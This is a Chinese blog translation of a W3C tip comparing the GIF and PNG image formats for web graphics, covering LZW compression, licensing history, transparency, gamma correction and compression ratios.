[W3C文档翻译]选择PNG还是GIF?

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script> 原文地址:http://www.w3.org/QA/Tips/png-gif

一、GIF VS PNG
  这次我们将会探讨这两种经常用于显示简单图片、logo的主要图像格式:
  
  • GIF(代表Graphics Interchange Format)于上世纪80年代末被开发出来,直到今天仍然被广泛地使用。
      
  • PNG(Portable Network Graphics)在1995年左右被开发出来,在1996年被W3C推荐使用,并在1998年为大部分的浏览器所支持。

      GIF
      GIF格式采用一种叫LZW的算法来压缩文件,LZW算法能在保持图像色彩的同时减少文件体积。
      GIF的优势在于它被广泛的支持并经常作为简单图片的默认格式。与其它格式相比较(尤其是PNG),GIF并不具有太多的技术优势,不过在互联网发展的最初几年里,对PNG的支持刚刚开始,相对于PNG来说GIF是一个更加安全的选择,可能在这篇文章写下来的时候GIF仍然是个更安全的选择,虽然GIF并不安全很多。
      环绕在GIF格式周围的一个问题就是优利系统公司对LZW算法的版权保护。在美国LZW的版权将于2003年6月20日到期,与此同时在加拿大、法国、意大利、德国、英国和日本LZW的版权保护则已经过期。
      
      PNG
      PNG是一种无损压缩、轻便、更易储存的可扩展文件格式。PNG没有像GIF那样的版权保护的限制。PNG支持索引颜色、灰度和真彩色,同时也能对alpha通道提供额外支持。PNG的图像位数可以达到16位。
      从网络角度来说,PNG相对于GIF有三点优势:
      
  • alpha通道(可变透明度)
      
  • 跨平台伽玛修正(控制图像亮度)和颜色修正
      
  • 双重空间间隔(一种改进的图像显示方法)
      

  同样的,在压缩图片方面PNG仍比GIF优秀(通常情况下压缩比要高上5%至25%)
  不过有些情况仍需要注意,老浏览器或者一些特殊的功能不能很好的支持PNG。如果你想了解不同浏览器对PNG的支持程度,你可以查看下面的文档:
  

二、相关资料、链接:
  


我要啦免费统计 <script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值